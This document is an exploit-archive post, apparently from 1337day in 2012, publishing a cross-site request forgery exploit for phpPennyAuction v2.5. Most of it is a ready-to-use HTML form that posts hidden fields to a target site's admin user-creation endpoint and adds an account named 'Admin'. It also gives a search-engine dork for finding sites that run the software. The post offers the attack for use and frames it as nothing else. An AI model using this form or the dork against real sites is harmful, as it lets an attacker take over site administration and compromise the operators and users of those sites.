facebook facebook twitter rss

phpPennyAuction v2.5 CSRF Vulnerability (Add Admin)

Author: AtT4CKxT3rR0r1ST , Published: 01-06-2012
phpPennyAuction v2.5 CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.phppennyauction.com/
.:. Tested On Demo : http://www.phppennyauctiondemo.com/
.:. Dork : "Powered by phpPennyAuction"
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SiTE/admin/users/add">
<input type="hidden" name="_method" value="POST"/>
<input type="hidden" name="data[User][id]" value=""/>
<input type="hidden" name="data[User][username]" value="Admin"/>
<input type="hidden" name="data[User][first_name]" value="Mohamad"/>
<input type="hidden" name="data[User][last_name]" value="Hussien"/>
<input type="hidden" name="data[User][email]" value="F.Hack@w.cn"/>
<input type="hidden" name="data[User][date_of_birth][month]" value="5"/>
<input type="hidden" name="data[User][date_of_birth][day]" value="17"/>
<input type="hidden" name="data[User][date_of_birth][year]" value="1991"/>
<input type="hidden" name="data[User][phone_number]" value="...."/>
<input type="hidden" name="data[User][gender_id]" value="1"/>
<input type="hidden" name="data[User][tax_number]" value="...."/>
<input type="hidden" name="data[User][newsletter]" value="0"/>
<input type="hidden" name="data[User][admin]" value="0"/>
</form>

</body>
</html>
####################################################################


# 1337day.com [2012-06-01]

Like us on Facebook :